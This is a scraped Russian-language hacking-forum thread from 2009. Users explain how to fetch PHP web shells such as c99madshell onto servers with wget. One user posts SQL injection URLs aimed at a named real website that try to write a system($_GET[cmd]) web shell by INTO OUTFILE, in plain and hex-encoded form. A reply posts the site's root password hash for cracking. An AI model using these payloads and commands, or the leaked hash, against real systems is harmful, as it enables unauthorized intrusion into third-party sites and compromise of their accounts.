Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

01.12.2009, 00:53
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Сообщение от RulleR
wget -o /papka/na/servere/shell.php http://shell.in/shell.txt
Сразу видно ты команду ниразу не юзал:
Код:
wget http://ya.ru/index.html -o 1.txt - поместит лог работы в 1.txt
wget http://ya.ru/index.html -O 1.txt - сохранит файл в 1.txt
|
|
|

01.12.2009, 01:19
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
Сообщение от Grey
Сразу видно ты команду ниразу не юзал:
Код:
wget http://ya.ru/index.html -o 1.txt - поместит лог работы в 1.txt
wget http://ya.ru/index.html -O 1.txt - сохранит файл в 1.txt
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php
где www.motorama.be/shell.php сайт куда надо загрузить шелл...
а wget http://site.ru/shell.txt
сайт где лежит код шелла...
Последний раз редактировалось 547; 01.12.2009 в 01:21..
|
|
|

01.12.2009, 01:27
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме: 1777055
Репутация:
347
|
|
Сообщение от 547
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php
где www.motorama.be/shell.php сайт куда надо загрузить шелл...
а wget http://site.ru/shell.txt
сайт где лежит код шелла...
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
|
|
|

01.12.2009, 01:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от bons
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
Мда уж... И зачем умничать? Это по-детски как-то. Честно, как ребенок говоришь...
547, я тебе уже в личке объяснял, еще раз напишу полный и рабочий пример использования wget
Код:
wget http://madnet.name/files/download/9_c99madshell.php -O c99madshell.php
В даном случае wget скачает файл, который находится по адресу http://madnet.name/files/download/9_c99madshell.php в файл c99madshell.php, который будет находится в текущей директории, т.е. в директории с которой был запущен wget. Если необходимо загрузить в отличную от текущей директорию, достаточно вместо c99madshell.php написать полный путь к файлу, н.п.
Код:
/var/www/images/smiles/smile.php
А вообще, читай
http://linux.about.com/od/commands/l/blcmdl1_wget.htm
|
|
|

01.12.2009, 13:50
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Подскажите файлохранлище с ПРЯМОЙ ссылкой на файл.
|
|
|

01.12.2009, 14:00
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме: 736224
Репутация:
388
|
|
Для меня лучший обменник - filehoster.Ru.
а так советую зарегать хост к примеру на юкозе, и туда лить файлы
|
|
|

01.12.2009, 14:03
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сообщение от Bb0y
Для меня лучший обменник - filehoster.Ru.
а так советую зарегать хост к примеру на юкозе, и туда лить файлы
мне нужно чтобы wget'ом качнуть потом можно было,прямая ссылка как я написал,без всяких подтверждений
|
|
|

01.12.2009, 14:14
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
регить сайт на народе - 1 мин.
|
|
|

01.12.2009, 14:18
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме: 1180165
Репутация:
11
|
|
Здравствуйте.
1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
Как можно залить шелл?
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
|
|
|

01.12.2009, 15:10
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сообщение от wkar
Здравствуйте.
1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
Как можно залить шелл?
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
кавычки экранируются. Облом с аутфайлом в общем.
Можешь хеш расшифровать к юзеру рут =)
root:C705FA72189D628A3657C885B0668778976F72E4
Последний раз редактировалось p.r0phe.t; 01.12.2009 в 15:27..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|